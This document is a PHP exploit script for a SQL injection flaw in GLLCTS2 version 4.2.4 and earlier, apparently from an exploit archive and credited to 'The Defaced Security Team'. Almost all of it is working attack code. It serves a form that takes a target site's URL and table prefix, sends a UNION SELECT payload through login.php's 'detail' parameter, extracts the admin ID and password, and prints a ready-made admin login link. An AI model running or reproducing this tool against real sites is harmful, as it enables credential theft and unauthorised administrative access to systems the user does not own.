GLLCTS2 <= 4.2.4 (login.php detail) SQL Injection Exploit

<?php set_time_limit(0); ignore_user_abort(0); function add_html_space($count){ $out2 = str_repeat(" ",$count); return $out2; } function write_content($title,$desc,$content){ $out = "<div class='content'><div class='item'><h1>$title</h1><div class='descr'>$desc</div><br><p>$content</p></div>"; return $out; } $title = "GLLCTS2 => v4.2.4". add_html_space(1) ." SQL Injection Exploit"; $header['banner'] = "TD's ESystem"; $header['main'] = "TD's Exploit System"; $menu['title'] = "Exploit System"; $menu['title1'] = "Esystem Home"; $menu['link1'] = "?"; $menu = "<div class=\"sidenav\"><h1>".$menu['title']."</h1><ul><li><a href='".$menu['link1']."'>".$menu['title1']."</a></li></ul><h1>Links To TD</h1><ul><li><a href=\"http://www.thedefaced.org\">Go To TheDefaced</a></li><li><a href=\"http://www.thedefaced.org/forums/\">Go To TheDefaced Forums</a></li></ul></div>"; $copyright = "</div><div class=\"clearer\"><span></span></div></div><br><div class=\"footer\">© 2004 - 2008 <a href=\"?\">The Defaced Security Team.</a><br>© 2008 $title By TheDefaced.org</div></span></div></div></body></html>"; $style = "<html><head><link rel=\"stylesheet\" type=\"text/css\" href=\"http://thedefaced.org/default_orig.css\" media=\"screen\"/><title>$title</title></head><body><div id=\"thedefaced\"><div class=\"container\"><span><div class=\"main\"><div class=\"header\"><div class=\"title\"><font size=\"0.1\"><a href=\"http://www.thedefaced.org\">$header[banner]</a></font></div></td></td></TABLE></td></tr></table></form></div><div class=\"footer\"><b>$header[main]</a></b></div>$menu"; echo $style; switch($_GET['page']){ default: If($_POST['inj'] == 'run'){ echo"<div class='content'>"; echo"<div class='item'><h1>TD's Exploit System</h1>"; echo"<div class='descr'>Grabing Admin ID and Password via GLLC SQL injection.</div>"; echo"<br><p>"; $url = $_POST['url']; $prefix = $_POST['prefix']; $buf = file_get_contents($url."/login.php?detail='%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,concat(CHAR(124),CHAR(65,%2068,%2077,%2073,%2078,%2073,%2068,%2058),admin_id,CHAR(124),CHAR(80,%2065,%2083,%2083,%2058),admin_pass,CHAR(124)),13,14,15,16,17,18,19,20,21,22,23%20from%20".$prefix."_admin/*"); $arr = explode("|",$buf); foreach($arr as $line){ if(eregi("ADMINID:", $line)) If($line !=$adminid){ $adminid = $line; echo $adminid."<br>"; } if(eregi("PASS:",$line)) If($pass == ""){ $pass = $line; $pass_parsed = str_replace("PASS:","",$pass); echo $pass."<br><br>"; echo "<a href='$url/admin/index.php?pass=$pass_parsed'>Login</a>"; } } echo"</font></b></p></div>"; echo $copyright; }else{ echo write_content("Welcome to TD's Exploit System","SQL injection exploit in GLLCTS2","<form method='post' action='?'><center><input type='hidden' name='inj' value='run'>GLLCTS2 URL(No Trailing \"/\" & Include \"http://\"):<br><input type='text' size='25' name='url'><br><br>Table Prefix:<br>". add_html_space(1) ."<input type='text' size='20' name='prefix' value='gllcts2'><br><br><input type='submit' value='Get Admin Info'></form>"); echo $copyright; } break; } ?>